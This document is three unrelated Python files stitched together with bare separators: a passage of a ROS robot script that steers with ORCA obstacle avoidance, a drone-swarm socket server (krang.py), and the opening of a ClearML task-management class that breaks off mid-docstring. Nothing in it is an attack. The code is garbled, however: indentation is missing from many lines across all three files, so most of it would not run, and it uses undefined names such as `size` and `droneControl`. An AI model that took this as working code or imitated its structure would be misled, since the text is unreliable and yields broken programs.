easyGo.mvStraight(SPEED, -1)
elif direc == 2: # turn left
easyGo.mvRotate(ROTATE_SPEED, -1, False)
elif direc == 3: # turn right
easyGo.mvRotate(ROTATE_SPEED, -1, True)
elif direc == 5: # stop
easyGo.stop()
#MIN_OBS_SIZE = 0.6 / 2
#MAX_OBS_SIZE = 1.4 / 2
# make random square object
'''
obs_center_size = [(random.uniform(-COL, COL), random.uniform(0, ROW), random.uniform(MIN_OBS_SIZE, MAX_OBS_SIZE)) for i in range(15)]
# osb_position must be convex in counter clock wise order
obs_position_list = [[(x-size, y-size),(x+size, y-size), (x+size, y+size), (x-size, y+size)] for x,y,size in obs_center_size]
obs = [sim.addObstacle(obs_position) for obs_position in obs_position_list]
'''
# single obstacle for test
# obs_position_list = [[(6.1,6.1), (4.1, 6.1), (4.1, 4.1)]]
#o1 = sim.addObstacle([(6.1,6.1), (4.1, 6.1), (4.1, 4.1)])
# obs_position_list = np.array(obs_position_list)
global obs_pos, self_pos, self_yaw
obs_pos = [[0, 0], [0, 0], [0, 0], [0, 0]]
self_pos = [0, 0]
self_yaw = 0.0
def make_obstacle_callback(idx):
    """Return an odometry callback that stores obstacle `idx`'s position in the
    robot frame: translate by the robot's position, then rotate by (1.57 - yaw)
    so that +y points straight ahead of the robot."""
    def callback(data):
        _x = data.pose.pose.position.x
        _y = data.pose.pose.position.y
        relative_x = _x - self_pos[1]
        relative_y = _y - self_pos[0]
        x2 = math.cos(1.57-self_yaw) * relative_x - math.sin(1.57-self_yaw) * relative_y
        y2 = math.sin(1.57-self_yaw) * relative_x + math.cos(1.57-self_yaw) * relative_y
        obs_pos[idx] = [x2, y2]
    return callback
# The four obstacle topics share the same logic; only the slot index differs.
ob1_callback = make_obstacle_callback(0)
ob2_callback = make_obstacle_callback(1)
ob3_callback = make_obstacle_callback(2)
ob4_callback = make_obstacle_callback(3)
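# Worked example of the transform above (illustrative numbers only): with
# self_pos = [0, 0] and self_yaw = 1.57 (robot facing "up" in the odom frame),
# an obstacle at odom (x=0, y=2) gives relative (0, 2); the rotation angle
# (1.57 - yaw) is 0, so the stored entry is [0, 2], i.e. two meters straight
# ahead of the robot, which is the frame the ORCA loop below expects.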
def self_callback(data):
global self_pos, self_yaw
_x = data.pose.pose.position.x
_y = data.pose.pose.position.y
ox = data.pose.pose.orientation.x
oy = data.pose.pose.orientation.y
oz = data.pose.pose.orientation.z
ow = data.pose.pose.orientation.w
self_yaw = qut2eu(ox, oy, oz, ow)
self_pos = [_y, _x]
def listener():
print('listener ready')
rospy.Subscriber("/tb3_4/odom", Odometry, self_callback)
rospy.Subscriber("/tb3_0/odom", Odometry, ob1_callback)
rospy.Subscriber("/tb3_1/odom", Odometry, ob2_callback)
rospy.Subscriber("/tb3_2/odom", Odometry, ob3_callback)
rospy.Subscriber("/tb3_3/odom", Odometry, ob4_callback)
rospy.spin()
def orca(verbose=False):
global obs_pos
global self_pos
global self_yaw
global Target
sim.processObstacles()
agents_position =[(0,0)]
agents = [sim.addAgent(position, 15.0, 10, 5.0, 2.0, 0.15, 3.0, (0.0,3.0)) for position in agents_position]
agents_velocity = [(0.0, 0.5)]
for agent, velocity in zip(agents, agents_velocity):
sim.setAgentPrefVelocity(agent, velocity)
pc2obs_time = 0.0
lpp_time = 0.0
dist = math.sqrt((Target[0] - self_pos[1])**2 + (Target[1] - self_pos[0])**2)
step = 0
while(dist > 0.3):
samples = np.array(obs_pos)
if type(samples) == type(False):
continue
t1 = time.time()
t2 = time.time()
dist = math.sqrt((Target[0] - self_pos[1])**2 + (Target[1] - self_pos[0])**2)
_obs = [[math.sqrt(y**2 + x**2)] for x,y in samples]
min_obs_dist = min(_obs)
min_obs_idx = np.argmin(_obs)
if samples[min_obs_idx][1] <= 0:
min_obs_dist[0] = 100
sim.clearObstacle()
obs_position_list = [[(x-size, y-size),(x+size, y-size), (x+size, y+size), (x-size, y+size)] for x,y in samples]
obs = [sim.addObstacle(obs_position) for obs_position in obs_position_list]
sim.processObstacles()
sim.setAgentPosition(0, (0,0))
positions = [sim.getAgentPosition(agent) for agent in agents]
sim.doStep()
positions = np.array(positions)
obs_position_list = np.array(obs_position_list)
velocity = [sim.getAgentVelocity(agent) for agent in agents]
print(min_obs_dist)
if min_obs_dist[0] > ORCA_THRES:
print('DAP')
dist = math.sqrt((Target[0] - self_pos[1])**2 + (Target[1] - self_pos[0])**2)
current_angle = self_yaw ##rad.
            desired_angle = math.atan2(Target[1]-self_pos[0],
                Target[0]-self_pos[1])
rot_angle = self_yaw - desired_angle
if np.abs(rot_angle) > math.pi:
rot_angle = -np.sign(rot_angle) * (2*math.pi - np.abs(rot_angle))
#print(self_yaw, 'for ', desired_angle)
if abs(rot_angle) < 0.2:
direc = 1 # go straight
elif rot_angle >= 0.2:
direc = 3 # turn right
elif rot_angle <= -0.2:
                direc = 2 # turn left
else:
print('ORCA')
if velocity[0][0] < 0:
direc = 2 # turn left
elif velocity[0][0] > 0:
direc = 3 # turn right
elif velocity[0][1] > 0:
direc = 1 # go straight
elif velocity[0][1] < 0:
direc = 4 # backward
else:
direc = 5 # stop
GoEasy(direc)
t3 = time.time()
pc2obs_time += t2-t1
lpp_time += t3-t2
# plt.arrow(positions[0][0], positions[0][1], velocity[0][0], velocity[0][1], width=0.05)
# for obs_position in obs_position_list:
# plt.plot(np.hstack([obs_position[:,0],obs_position[0][0]]), np.hstack([obs_position[:,1],obs_position[0][1]]))
# plt.scatter(positions[:,0], positions[:,1], label='agents')
# if len(samples) != 0:
# plt.scatter(samples[:,0], samples[:,1], label='samples')
# plt.legend()
# plt.title("Trajectories of the agnets")
# plt.xlabel("x (m)")
# plt.ylabel("y (m)")
# plt.xlim(-5,5)
# plt.ylim(-2,8)
# plt.pause(0.001)
# plt.cla()
print("{:.6f} sec simulated".format(step/SIMUL_HZ))
time.sleep(0.1)
step += 1
easyGo.stop()
rospy.signal_shutdown("esc")
sys.exit(1)
def load_orca():
print("orca ready")
orca_thread = threading.Thread(target=orca)
orca_thread.start()
if __name__ == "__main__":
try:
load_orca()
listener()
except KeyboardInterrupt:
print("Interrupted by key")
|
krang.py
|
import numpy as np
import threading
import time
import socket
import swarmNet
import os
import math
import struct
import senseControl
def krangServer(ip):
print(' - - -- starting the drone center command')
    global running
    global started
    global state
backlog = 1 # how many connections to accept
maxsize = 28
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
binded = False
while not binded:
try:
server.bind((ip,swarmNet.droneCommLeftPort))
binded = True
except:
            print('- krangServer -- binding failed')
binded = False
time.sleep(20)
server.listen(1)
while running:
print('--- waiting for a connection')
try:
connection, client_address = server.accept()
print('------ Connection coming from ' + str(client_address))
code = struct.unpack('i',connection.recv(4))[0]
print('------ code : '+ str(code))
if code == swarmNet.requestStatusCode:
data = struct.pack('ii', swarmNet.sendStatusCode,state)
try:
connection.sendall(data)
except:
print('sending did not work :/ but better not break everything')
if code == swarmNet.startCode[0]:
data = struct.pack('i', code+1)
try:
connection.sendall(data)
except:
print('sending did not work :/ but better not break everything')
droneControl.TakeOff()
started = True
state =2
try:
connection.sendall(data)
except:
print('sending did not work :/ but better not break everything')
        except ValueError as e:
            print(e)
running = True
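# Minimal client-side sketch (illustrative only, not used by this script): how
# a peer could query krangServer over the same 4-byte struct framing. It
# assumes the swarmNet constants referenced above (requestStatusCode,
# droneCommLeftPort) keep the meaning they have in krangServer().
def _example_status_query(ip):
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect((ip, swarmNet.droneCommLeftPort))
    # Send the status request code, then read back (sendStatusCode, state).
    client.sendall(struct.pack('i', swarmNet.requestStatusCode))
    reply_code, reply_state = struct.unpack('ii', client.recv(8))
    client.close()
    return reply_code, reply_state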
def main():
global running
senseController = senseControl.senseController()
t0 = time.time()
ti=t0
#displayStart()
statusThread = threading.Thread(target = swarmNet.giveStatus, args=(swarmNet.krangIP,))
statusThread.daemon = True
statusThread.start()
statusThread = threading.Thread(target = krangServer, args=(swarmNet.krangIP,))
statusThread.daemon = True
statusThread.start()
while running:
time.sleep(60)
print('---- waiting for your drones')
if __name__ == '__main__':
main()
|
task.py
|
""" Backend task management support """
import itertools
import json
import logging
import os
import re
import sys
import warnings
from copy import copy
from datetime import datetime
from enum import Enum
from multiprocessing import RLock
from operator import itemgetter
from tempfile import gettempdir
from threading import Thread
from typing import Optional, Any, Sequence, Callable, Mapping, Union, List, Set
from uuid import uuid4
from pathlib2 import Path
try:
# noinspection PyCompatibility
from collections.abc import Iterable
except ImportError:
from collections import Iterable
import six
from six.moves.urllib.parse import quote
from ...utilities.locks import RLock as FileRLock
from ...utilities.proxy_object import verify_basic_type
from ...binding.artifacts import Artifacts
from ...backend_interface.task.development.worker import DevWorker
from ...backend_interface.session import SendError
from ...backend_api import Session
from ...backend_api.services import tasks, models, events, projects
from ...backend_api.session.defs import ENV_OFFLINE_MODE
from ...utilities.pyhocon import ConfigTree, ConfigFactory
from ...utilities.config import config_dict_to_text, text_to_config_dict
from ..base import IdObjectBase, InterfaceBase
from ..metrics import Metrics, Reporter
from ..model import Model
from ..setupuploadmixin import SetupUploadMixin
from ..util import (
make_message, get_or_create_project, get_single_result,
exact_match_regex, mutually_exclusive, )
from ...config import (
get_config_for_bucket, get_remote_task_id, TASK_ID_ENV_VAR,
running_remotely, get_cache_dir, DOCKER_IMAGE_ENV_VAR, get_offline_dir, get_log_to_backend, deferred_config, )
from ...debugging import get_logger
from ...storage.helper import StorageHelper, StorageError
from .access import AccessMixin
from .repo import ScriptInfo, pip_freeze
from .hyperparams import HyperParams
from ...config import config, PROC_MASTER_ID_ENV_VAR, SUPPRESS_UPDATE_MESSAGE_ENV_VAR, DOCKER_BASH_SETUP_ENV_VAR
from ...utilities.process.mp import SingletonLock
class Task(IdObjectBase, AccessMixin, SetupUploadMixin):
""" Task manager providing task object access and management. Includes read/write access to task-associated
frames and models.
"""
_anonymous_dataview_id = '__anonymous__'
_development_tag = 'development'
archived_tag = 'archived'
_default_configuration_section_name = 'General'
_legacy_parameters_section_name = 'Args'
_force_requirements = {}
_ignore_requirements = set()
_store_diff = deferred_config('development.store_uncommitted_code_diff', False)
_store_remote_diff = deferred_config('development.store_code_diff_from_remote', False)
_report_subprocess_enabled = deferred_config('development.report_use_subprocess', sys.platform == 'linux')
_force_use_pip_freeze = deferred_config(multi=[('development.detect_with_pip_freeze', False),
('development.detect_with_conda_freeze', False)])
_offline_filename = 'task.json'
class TaskTypes(Enum):
def __str__(self):
return str(self.value)
def __eq__(self, other):
return str(self) == str(other)
training = 'training'
testing = 'testing'
inference = "inference"
data_processing = "data_processing"
application = "application"
monitor = "monitor"
controller = "controller"
optimizer = "optimizer"
service = "service"
qc = "qc"
custom = "custom"
class TaskStatusEnum(Enum):
def __str__(self):
return str(self.value)
def __eq__(self, other):
return str(self) == str(other)
created = "created"
queued = "queued"
in_progress = "in_progress"
stopped = "stopped"
published = "published"
publishing = "publishing"
closed = "closed"
failed = "failed"
completed = "completed"
unknown = "unknown"
class DeleteError(Exception):
pass
def __init__(self, session=None, task_id=None, log=None, project_name=None,
task_name=None, task_type=TaskTypes.training, log_to_backend=True,
raise_on_validation_errors=True, force_create=False):
"""
Create a new task instance.
:param session: Optional API Session instance. If not provided, a default session based on the system's
configuration will be used.
:type session: Session
:param task_id: Optional task ID. If not provided, a new task will be created using the API
and its information reflected in the resulting instance.
:type task_id: string
        :param log: Optional log to be used. If not provided, an internal log shared with all backend objects will be
used instead.
:type log: logging.Logger
:param project_name: Optional project name, minimum length of 3 characters, used only if a new task is created.
The new task will be associated with a project by this name. If no such project exists, a new project will
be created using the API.
:type project_name: str
:param task_name: Optional task name, minimum length of 3 characters, used only if a new task is created.
        :type task_name: str
:param task_type: Optional task type, used only if a new task is created. Default is training task.
:type task_type: str (see tasks.TaskTypeEnum)
:param log_to_backend: If True, all calls to the task's log will be logged to the backend using the API.
This value can be overridden using the environment variable TRAINS_LOG_TASK_TO_BACKEND.
:type log_to_backend: bool
:param force_create: If True a new task will always be created (task_id, if provided, will be ignored)
:type force_create: bool
"""
SingletonLock.instantiate()
task_id = self._resolve_task_id(task_id, log=log) if not force_create else None
self.__edit_lock = None
super(Task, self).__init__(id=task_id, session=session, log=log)
self._project_name = None
self._storage_uri = None
self._metrics_manager = None
self.__reporter = None
self._curr_label_stats = {}
self._raise_on_validation_errors = raise_on_validation_errors
self._parameters_allowed_types = tuple(set(
six.string_types + six.integer_types + (six.text_type, float, list, tuple, dict, type(None))
))
self._app_server = None
self._files_server = None
self._initial_iteration_offset = 0
self._reload_skip_flag = False
if not task_id:
# generate a new task
self.id = self._auto_generate(project_name=project_name, task_name=task_name, task_type=task_type)
if self._offline_mode:
self.data.id = self.id
self.name = task_name
else:
# this is an existing task, let's try to verify stuff
self._validate()
if self.data is None:
raise ValueError("Task ID \"{}\" could not be found".format(self.id))
self._project_name = (self.project, project_name)
if running_remotely() or DevWorker.report_stdout:
log_to_backend = False
self._log_to_backend = get_log_to_backend(default=log_to_backend)
self._artifacts_manager = Artifacts(self)
self._hyper_params_manager = HyperParams(self)
def _validate(self, check_output_dest_credentials=True):
raise_errors = self._raise_on_validation_errors
output_dest = self.get_output_destination(raise_on_error=False, log_on_error=False)
if output_dest and check_output_dest_credentials:
try:
self.log.info('Validating output destination')
conf = get_config_for_bucket(base_url=output_dest)
if not conf:
msg = 'Failed resolving output destination (no credentials found for %s)' % output_dest
self.log.warning(msg)
if raise_errors:
raise Exception(msg)
except StorageError:
raise
except Exception as ex:
self.log.error('Failed trying to verify output destination: %s' % ex)
@classmethod
def _resolve_task_id(cls, task_id, log=None):
if not task_id:
task_id = cls.normalize_id(get_remote_task_id())
if task_id:
log = log or get_logger('task')
log.info('Using task ID from env %s=%s' % (TASK_ID_ENV_VAR[0], task_id))
return task_id
def _update_repository(self):
def check_package_update():
# noinspection PyBroadException
try:
# check latest version
from ...utilities.check_updates import CheckPackageUpdates
latest_version = CheckPackageUpdates.check_new_package_available(only_once=True)
if latest_version and not SUPPRESS_UPDATE_MESSAGE_ENV_VAR.get(
default=config.get('development.suppress_update_message', False)):
if not latest_version[1]:
sep = os.linesep
self.get_logger().report_text(
'{} new package available: UPGRADE to v{} is recommended!\nRelease Notes:\n{}'.format(
Session.get_clients()[0][0].upper(), latest_version[0], sep.join(latest_version[2])),
)
else:
self.get_logger().report_text(
'ClearML new version available: upgrade to v{} is recommended!'.format(
latest_version[0]),
)
except Exception:
pass
# get repository and create requirements.txt from code base
try:
check_package_update_thread = Thread(target=check_package_update)
check_package_update_thread.daemon = True
check_package_update_thread.start()
# do not request requirements, because it might be a long process, and we first want to update the git repo
result, script_requirements = ScriptInfo.get(
filepaths=[self._calling_filename, sys.argv[0], ]
if ScriptInfo.is_running_from_module() else [sys.argv[0], self._calling_filename, ],
log=self.log, create_requirements=False,
check_uncommitted=self._store_diff, uncommitted_from_remote=self._store_remote_diff
)
for msg in result.warning_messages:
self.get_logger().report_text(msg)
# if the git is too large to store on the task, we must store it as artifact:
if result.auxiliary_git_diff:
diff_preview = "# git diff too large to handle, storing as artifact. git diff summary:\n"
diff_preview += '\n'.join(
line for line in result.auxiliary_git_diff.split('\n') if line.startswith('diff --git '))
self._artifacts_manager.upload_artifact(
name='auxiliary_git_diff', artifact_object=result.auxiliary_git_diff,
preview=diff_preview,
)
# store original entry point
entry_point = result.script.get('entry_point') if result.script else None
# check if we are running inside a module, then we should set our entry point
# to the module call including all argv's
result.script = ScriptInfo.detect_running_module(result.script)
# Since we might run asynchronously, don't use self.data (let someone else
# overwrite it before we have a chance to call edit)
with self._edit_lock:
self.reload()
self.data.script = result.script
self._edit(script=result.script)
# if jupyter is present, requirements will be created in the background, when saving a snapshot
if result.script and script_requirements:
entry_point_filename = None if config.get('development.force_analyze_entire_repo', False) else \
os.path.join(result.script['working_dir'], entry_point)
if self._force_use_pip_freeze:
if isinstance(self._force_use_pip_freeze, (str, Path)):
conda_requirements = ''
req_file = Path(self._force_use_pip_freeze)
requirements = req_file.read_text() if req_file.is_file() else None
else:
requirements, conda_requirements = pip_freeze(
combine_conda_with_pip=config.get('development.detect_with_conda_freeze', True))
requirements = '# Python ' + sys.version.replace('\n', ' ').replace('\r', ' ') + '\n\n'\
+ requirements
else:
requirements, conda_requirements = script_requirements.get_requirements(
entry_point_filename=entry_point_filename)
if requirements:
if not result.script['requirements']:
result.script['requirements'] = {}
result.script['requirements']['pip'] = requirements
result.script['requirements']['conda'] = conda_requirements
self._update_requirements(result.script.get('requirements') or '')
# we do not want to wait for the check version thread,
# because someone might wait for us to finish the repo detection update
except SystemExit:
pass
except Exception as e:
get_logger('task').debug(str(e))
def _auto_generate(self, project_name=None, task_name=None, task_type=TaskTypes.training):
created_msg = make_message('Auto-generated at %(time)s UTC by %(user)s@%(host)s')
if isinstance(task_type, self.TaskTypes):
task_type = task_type.value
if task_type not in (self.TaskTypes.training.value, self.TaskTypes.testing.value) and \
not Session.check_min_api_version('2.8'):
print('WARNING: Changing task type to "{}" : '
'clearml-server does not support task type "{}", '
'please upgrade clearml-server.'.format(self.TaskTypes.training, task_type))
task_type = self.TaskTypes.training.value
project_id = None
if project_name:
project_id = get_or_create_project(self, project_name)
tags = [self._development_tag] if not running_remotely() else []
extra_properties = {'system_tags': tags} if Session.check_min_api_version('2.3') else {'tags': tags}
req = tasks.CreateRequest(
name=task_name or make_message('Anonymous task (%(user)s@%(host)s %(time)s)'),
type=tasks.TaskTypeEnum(task_type),
comment=created_msg,
project=project_id,
input={'view': {}},
**extra_properties
)
res = self.send(req)
return res.response.id if res else 'offline-{}'.format(str(uuid4()).replace("-", ""))
def _set_storage_uri(self, value):
value = value.rstrip('/') if value else None
self._storage_uri = StorageHelper.conform_url(value)
self.data.output.destination = self._storage_uri
self._edit(output_dest=self._storage_uri or ('' if Session.check_min_api_version('2.3') else None))
@property
def storage_uri(self):
# type: () -> Optional[str]
if self._storage_uri:
return self._storage_uri
if running_remotely():
return self.data.output.destination
else:
return None
@storage_uri.setter
def storage_uri(self, value):
# type: (str) -> ()
self._set_storage_uri(value)
@property
def task_id(self):
# type: () -> str
return self.id
@property
def name(self):
# type: () -> str
return self.data.name or ''
@name.setter
def name(self, value):
# type: (str) -> ()
self.set_name(value)
@property
def task_type(self):
# type: () -> str
return self.data.type
@property
def project(self):
# type: () -> str
return self.data.project
@property
def parent(self):
# type: () -> str
return self.data.parent
@property
def input_models_id(self):
# type: () -> Mapping[str, str]
if not Session.check_min_api_version("2.13"):
model_id = self._get_task_property('execution.model', raise_on_error=False)
return {'Input Model': model_id} if model_id else {}
input_models = self._get_task_property('models.input', default=[]) or []
return {m.name: m.model for m in input_models}
@property
def output_models_id(self):
# type: () -> Mapping[str, str]
if not Session.check_min_api_version("2.13"):
model_id = self._get_task_property('output.model', raise_on_error=False)
return {'Output Model': model_id} if model_id else {}
output_models = self._get_task_property('models.output', default=[]) or []
return {m.name: m.model for m in output_models}
@property
def comment(self):
# type: () -> str
return self.data.comment or ''
@comment.setter
def comment(self, value):
# type: (str) -> ()
self.set_comment(value)
@property
def cache_dir(self):
# type: () -> Path
""" The cache directory which is used to store the Task related files. """
return Path(get_cache_dir()) / self.id
@property
def status(self):
# type: () -> str
"""
        The Task's status. To keep the Task updated, ClearML reloads the Task status
        information only when this value is accessed.
        :return str: TaskStatusEnum status
"""
return self.get_status()
@property
def _status(self):
# type: () -> str
""" Return the task's cached status (don't reload if we don't have to) """
return str(self.data.status)
def reload(self):
# type: () -> ()
"""
Reload current Task's state from clearml-server.
Refresh all task's fields, including artifacts / models / parameters etc.
"""
return super(Task, self).reload()
def _get_output_model(self, upload_required=True, model_id=None):
# type: (bool, Optional[str]) -> Model
return Model(
session=self.session,
model_id=model_id or None,
cache_dir=self.cache_dir,
upload_storage_uri=self.storage_uri or self.get_output_destination(
raise_on_error=upload_required, log_on_error=upload_required),
upload_storage_suffix=self._get_output_destination_suffix('models'),
log=self.log)
@property
def metrics_manager(self):
# type: () -> Metrics
""" A metrics manager used to manage the metrics related to this task """
return self._get_metrics_manager(self.get_output_destination())
@property
def _reporter(self):
# type: () -> Reporter
"""
Returns a simple metrics reporter instance.
"""
if self.__reporter is None:
self._setup_reporter()
return self.__reporter
def _get_metrics_manager(self, storage_uri):
# type: (str) -> Metrics
if self._metrics_manager is None:
self._metrics_manager = Metrics(
session=self.session,
task=self,
storage_uri=storage_uri,
storage_uri_suffix=self._get_output_destination_suffix('metrics'),
iteration_offset=self.get_initial_iteration()
)
return self._metrics_manager
def _setup_reporter(self):
# type: () -> Reporter
try:
storage_uri = self.get_output_destination(log_on_error=False)
except ValueError:
storage_uri = None
self.__reporter = Reporter(
metrics=self._get_metrics_manager(storage_uri=storage_uri), task=self)
return self.__reporter
def _get_output_destination_suffix(self, extra_path=None):
# type: (Optional[str]) -> str
return '/'.join(quote(x, safe="'[]{}()$^,.; -_+-=") for x in
(self.get_project_name(), '%s.%s' % (self.name, self.data.id), extra_path) if x)
def _reload(self):
# type: () -> Any
""" Reload the task object from the backend """
with self._edit_lock:
if self._offline_mode:
# noinspection PyBroadException
try:
with open((self.get_offline_mode_folder() / self._offline_filename).as_posix(), 'rt') as f:
stored_dict = json.load(f)
stored_data = tasks.Task(**stored_dict)
# add missing entries
for k, v in stored_dict.items():
if not hasattr(stored_data, k):
setattr(stored_data, k, v)
if stored_dict.get('project_name'):
self._project_name = (None, stored_dict.get('project_name'))
except Exception:
stored_data = self._data
return stored_data or tasks.Task(
execution=tasks.Execution(
parameters={}, artifacts=[], dataviews=[], model='',
model_desc={}, model_labels={}, docker_cmd=''),
output=tasks.Output())
if self._reload_skip_flag and self._data:
return self._data
res = self.send(tasks.GetByIdRequest(task=self.id))
return res.response.task
def reset(self, set_started_on_success=True):
# type: (bool) -> ()
"""
Reset the task. Task will be reloaded following a successful reset.
:param set_started_on_success: If True automatically set Task status to started after resetting it.
"""
self.send(tasks.ResetRequest(task=self.id))
if set_started_on_success:
self.started()
elif self._data:
# if not started, make sure the current cached state is synced
self._data.status = self.TaskStatusEnum.created
self.reload()
def started(self, ignore_errors=True, force=False):
# type: (bool, bool) -> ()
""" The signal that this Task started. """
return self.send(tasks.StartedRequest(self.id, force=force), ignore_errors=ignore_errors)
def stopped(self, ignore_errors=True, force=False):
# type: (bool, bool) -> ()
""" The signal that this Task stopped. """
return self.send(tasks.StoppedRequest(self.id, force=force), ignore_errors=ignore_errors)
def completed(self, ignore_errors=True):
# type: (bool) -> ()
"""
.. note:: Deprecated, use mark_completed(...) instead
"""
warnings.warn("'completed' is deprecated; use 'mark_completed' instead.", DeprecationWarning)
return self.mark_completed(ignore_errors=ignore_errors)
def mark_completed(self, ignore_errors=True):
# type: (bool) -> ()
""" The signal indicating that this Task completed. """
if hasattr(tasks, 'CompletedRequest') and callable(tasks.CompletedRequest):
return self.send(tasks.CompletedRequest(self.id, status_reason='completed'), ignore_errors=ignore_errors)
return self.send(tasks.StoppedRequest(self.id, status_reason='completed'), ignore_errors=ignore_errors)
def mark_failed(self, ignore_errors=True, status_reason=None, status_message=None, force=False):
# type: (bool, Optional[str], Optional[str], bool) -> ()
""" The signal that this Task stopped. """
return self.send(
tasks.FailedRequest(
task=self.id, status_reason=status_reason, status_message=status_message, force=force),
ignore_errors=ignore_errors,
)
def publish(self, ignore_errors=True):
# type: (bool) -> ()
""" The signal that this Task will be published """
if str(self.status) not in (str(tasks.TaskStatusEnum.stopped), str(tasks.TaskStatusEnum.completed)):
raise ValueError("Can't publish, Task is not stopped")
resp = self.send(tasks.PublishRequest(self.id), ignore_errors=ignore_errors)
assert isinstance(resp.response, tasks.PublishResponse)
return resp
def _delete(
self,
delete_artifacts_and_models=True,
skip_models_used_by_other_tasks=True,
raise_on_error=False,
):
# type: (bool, bool, bool) -> bool
"""
Delete the task as well as it's output models and artifacts.
Models and artifacts are deleted from their storage locations, each using its URI.
Note: in order to delete models and artifacts using their URI, make sure the proper storage credentials are
configured in your configuration file (e.g. if an artifact is stored in S3, make sure sdk.aws.s3.credentials
are properly configured and that you have delete permission in the related buckets).
:param delete_artifacts_and_models: If True, artifacts and models would also be deleted (default True)
:param skip_models_used_by_other_tasks: If True, models used by other tasks would not be deleted (default True)
:param raise_on_error: If True an exception will be raised when encountering an error.
If False an error would be printed and no exception will be raised.
:return: True if the task was deleted successfully.
"""
try:
res = self.send(tasks.GetByIdRequest(self.task_id))
task = res.response.task
if task.status == Task.TaskStatusEnum.published:
if raise_on_error:
raise self.DeleteError("Cannot delete published task {}".format(self.task_id))
self.log.error("Cannot delete published task {}".format(self.task_id))
return False
execution = {}
models_res = []
if delete_artifacts_and_models:
execution = task.execution.to_dict() if task.execution else {}
models_res = self.send(
models.GetAllRequest(
task=[task.id], only_fields=["id", "uri"]
)
).response.models
event_uris = list(self._get_all_events(
event_type="training_debug_image", unique_selector=itemgetter("url"), batch_size=10000
))
event_uris.extend(self._get_image_plot_uris())
task_deleted = self.send(tasks.DeleteRequest(self.task_id, force=True))
if not task_deleted:
if raise_on_error:
raise self.DeleteError("Failed deleting task {}".format(self.task_id))
self.log.error("Failed deleting task {}".format(self.task_id))
return False
except self.DeleteError:
raise
except Exception as ex:
if raise_on_error:
raise self.DeleteError("Task deletion failed: {}".format(ex))
self.log.error("Task deletion failed: {}".format(ex))
return False
failures = []
if delete_artifacts_and_models:
for e in execution["artifacts"]:
if e["mode"] == "output" and not self._delete_uri(e["uri"]):
failures.append(e["uri"])
for m in models_res:
# noinspection PyBroadException
try:
is_output_model = task.output and (m.id == task.output.model)
res = self.send(
models.DeleteRequest(m.id, force=(not skip_models_used_by_other_tasks)),
ignore_errors=is_output_model
)
                    # Should delete if the model was deleted, or if this was the output model (which was already
                    # deleted by DeleteRequest and whose URI is now dangling).
should_delete = is_output_model or res.response.deleted
except SendError as ex:
if (ex.result.meta.result_code, ex.result.meta.result_subcode) == (400, 201):
# Model not found, already deleted by DeleteRequest
should_delete = True
else:
failures.append("model id: {}".format(m.id))
continue
except Exception:
failures.append("model id: {}".format(m.id))
continue
if should_delete and not self._delete_uri(m.uri):
failures.append(m.uri)
event_uris = list(filter(None, event_uris))
for uri in event_uris:
if not self._delete_uri(uri):
failures.append(uri)
failures = list(filter(None, failures))
if len(failures):
error = "Failed deleting the following URIs:\n{}".format(
"\n".join(failures)
)
if raise_on_error:
raise self.DeleteError(error)
self.log.error(error)
return task_deleted
def _delete_uri(self, uri):
# type: (str) -> bool
# noinspection PyBroadException
try:
deleted = StorageHelper.get(uri).delete(uri)
if deleted:
self.log.debug("Deleted file: {}".format(uri))
return True
except Exception as ex:
self.log.error("Failed deleting {}: {}".format(uri, str(ex)))
return False
return False
def _get_image_plot_uris(self):
# type: () -> Set[str]
def image_source_selector(d):
plot = d.get("plot_str")
if plot:
# noinspection PyBroadException
try:
plot = json.loads(plot)
return next(
filter(None, (image.get("source") for image in plot.get("layout", {}).get("images", []))),
None
)
except Exception:
pass
return self._get_all_events(
event_type="plot",
unique_selector=image_source_selector,
batch_size=10000
)
def update_model_desc(self, new_model_desc_file=None):
# type: (Optional[str]) -> ()
""" Change the Task's model description. """
with self._edit_lock:
self.reload()
execution = self._get_task_property('execution')
p = Path(new_model_desc_file)
if not p.is_file():
                raise IOError('model_desc file %s cannot be found' % new_model_desc_file)
new_model_desc = p.read_text()
model_desc_key = list(execution.model_desc.keys())[0] if execution.model_desc else 'design'
execution.model_desc[model_desc_key] = new_model_desc
res = self._edit(execution=execution)
return res.response
def update_output_model(
self,
model_path, # type: str
name=None, # type: Optional[str]
comment=None, # type: Optional[str]
tags=None, # type: Optional[Sequence[str]]
model_name=None, # type: Optional[str]
iteration=None, # type: Optional[int]
):
# type: (...) -> str
"""
Update the Task's output model weights file. First, ClearML uploads the file to the preconfigured output
destination (see the Task's ``output.destination`` property or call the ``setup_upload`` method),
        then ClearML updates the model object associated with the Task via an API call. The API call uses the URI
        of the uploaded file, and other values provided by additional arguments.
:param model_path: A local weights file or folder to be uploaded.
If remote URI is provided (e.g. http:// or s3: // etc) then the URI is stored as is, without any upload
:param name: The updated model name.
If not provided, the name is the model weights file filename without the extension.
:param comment: The updated model description. (Optional)
:param tags: The updated model tags. (Optional)
:param model_name: If provided the model name as it will appear in the model artifactory. (Optional)
Default: Task.name - name
:param iteration: iteration number for the current stored model (Optional)
:return: The URI of the uploaded weights file.
Notice: upload is done is a background thread, while the function call returns immediately
"""
from ...model import OutputModel
output_model = OutputModel(
task=self,
name=model_name or ('{} - {}'.format(self.name, name) if name else self.name),
tags=tags,
comment=comment
)
output_model.connect(task=self, name=name)
url = output_model.update_weights(weights_filename=model_path, iteration=iteration)
return url
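    # Illustrative usage of update_output_model() (the path and names below are
    # made up):
    #   uri = task.update_output_model(model_path='weights/model.pt', name='best', iteration=100)
    #   # `uri` points at the uploaded copy; the upload itself runs in a background thread.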
@property
def labels_stats(self):
# type: () -> dict
""" Get accumulated label stats for the current/last frames iteration """
return self._curr_label_stats
def _accumulate_label_stats(self, roi_stats, reset=False):
# type: (dict, bool) -> ()
if reset:
self._curr_label_stats = {}
for label in roi_stats:
if label in self._curr_label_stats:
self._curr_label_stats[label] += roi_stats[label]
else:
self._curr_label_stats[label] = roi_stats[label]
def set_input_model(
self,
model_id=None,
model_name=None,
update_task_design=True,
update_task_labels=True,
name=None
):
# type: (str, Optional[str], bool, bool, Optional[str]) -> ()
"""
Set a new input model for the Task. The model must be "ready" (status is ``Published``) to be used as the
Task's input model.
:param model_id: The Id of the model on the **ClearML Server** (backend). If ``model_name`` is not specified,
then ``model_id`` must be specified.
:param model_name: The model name in the artifactory. The model_name is used to locate an existing model
